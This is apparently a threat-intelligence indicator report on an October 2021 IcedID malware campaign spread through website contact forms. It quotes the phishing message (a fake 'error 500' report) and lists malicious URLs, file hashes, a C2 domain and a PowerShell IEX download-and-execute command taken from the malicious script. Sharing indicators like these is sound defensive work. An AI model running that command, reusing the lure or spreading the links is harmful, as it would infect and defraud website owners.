2021-10-26 Contact Forms IOCs (IcedID)

THREAT ATTRIBUTION:  ICEDID

SUBJECTS OBSERVED
Contact Submission

SENDERS OBSERVED
AlexisCastillo26@mail.com

EMAIL BODY
name: Alexis
email: AlexisCastillo26@mail.com
message: Hi, I'm Alexis, I just noticed that there is the "error 500"
appearing on some of your website pages. I'm pretty positive that
those types of errors won't be appreciated by your customers and you
are basically losing money as a result, plus they can significantly
reduce the number of clicks from Google. I've decided to help and
created the document for you with a few screenshots of errors and also
indicated the links to the pages where they appear, hope it helps.
Here's the link to the doc, check it out:
https://storage.googleapis.com/m4b38h10cm38.appspot.com/gdrive/folders/0/public/d/4jn4v9fjn4d2.html?n=555440817225343472
Have a good day!

MALDOC DISTRIBUTION URLS
https://storage.googleapis.com/m4b38h10cm38.appspot.com/gdrive/folders/0/public/d/4jn4v9fjn4d2.html?n=555440817225343472

https://mossopia.top/bgstat60943/

https://drive.google.com/uc?export=download&id=1fm9WevIgigIEgV10TdZd7qOyeXpI677p

https://doc-0g-14-docs.googleusercontent.com/docs/securesc/nftb4o5rhrsr91v33bvevj7ar66f4guf/r90gu2taif0llot73d1k8s2btstivn53/1635265425000/10323111707164989971/00981599246008734149Z/1fm9WevIgigIEgV10TdZd7qOyeXpI677p?e=download

MALDOC FROM DISTRIBUTION URL
Critical Errors Report.zip
9989d49f7810cffcd07e21bfe8990e50

which contains:
Critical Errors Report.js
405b4502173e3cc554e6488f5016b107

POWERSHELL COMMANDS FROM MALDOC
IEX (New-Object Net.Webclient).downloadstring("http://zombateg.top/222g100/index.php")

ICEDID PAYLOAD DOWNLOAD URLS
http://zombateg.top/222g100/index.php
http://zombateg.top/222g100/main.php

ICEDID PAYLOAD FILE HASH
oJUfIy.bin
e6ecf3eaf39d7bd74dde633311d998a3

ICEDID C2
http://portedauthenticati.ink/